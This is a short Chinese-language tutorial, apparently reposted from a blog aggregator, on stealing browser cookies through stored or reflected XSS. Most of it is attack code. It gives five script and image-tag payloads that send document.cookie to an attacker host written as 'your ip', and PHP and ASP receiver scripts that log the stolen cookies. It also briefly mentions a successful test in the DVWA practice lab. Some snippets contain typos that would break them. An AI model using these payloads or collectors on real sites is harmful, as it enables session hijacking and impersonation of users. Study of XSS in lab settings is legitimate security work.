虽然cookie信息经过加密,即使被网络上一些别有用心的人截获也不必担心,但现在遇到的问题,窃取cookie的人不需要知道字符的含义,直接利用cookie通过服务器验证就可以冒充用户的身份
假设一个网站有存储型xss(或反射xss),攻击者可以写入窃取cookie信息的恶意代码,在用户浏览xss网页时,触发恶意代码获取用户的cookie
攻击者通常使用以下语句盗取用户cookie信息
<script>
document.location='http://your ip/cookie.php?cookie='+document.cookie;
</script>
<img src='http://your ip/cookie.php?cookie='+document.cookie></img>
<script>
new Image().src='http://your ip/cookie.php?cookie='+document.cookie;
</script>
<script>
img = new Image();
img.src='http://your ip/cookie.php?cookie='+document.cookie;
img.width = 0;
img.height = 0;
</script>
<script>
document.wirte('<img src='http://your ip/cookie.php?cookie='+document.cookie+ width=0 height=0 border=0 />');
</script>
在远程服务器,接受cookie代码
PHP版本
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>
ASP版本
<%
msg=Request . ServerVariables ("QUERY STRING")
testfile=Server . MapPath ("cookie. txt")
setfs=server .Create0bject ("scripting. filesystemobject")set thisfile=fs . OpenTextFile(testfile,8, True, 0)
thisfile. Writeline ("" &msg& "")
thisfile.close
set fs = nothing
%>
用DVWA靶场测试
修改页面最大长度限制
插入盗取cookie的恶意代码
查看接受cookie文件,可见盗取成功文章来源:https://www.toymoban.com/news/detail-438797.html
文章来源地址https://www.toymoban.com/news/detail-438797.html
到了这里,关于xss盗取cookie原理剖析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!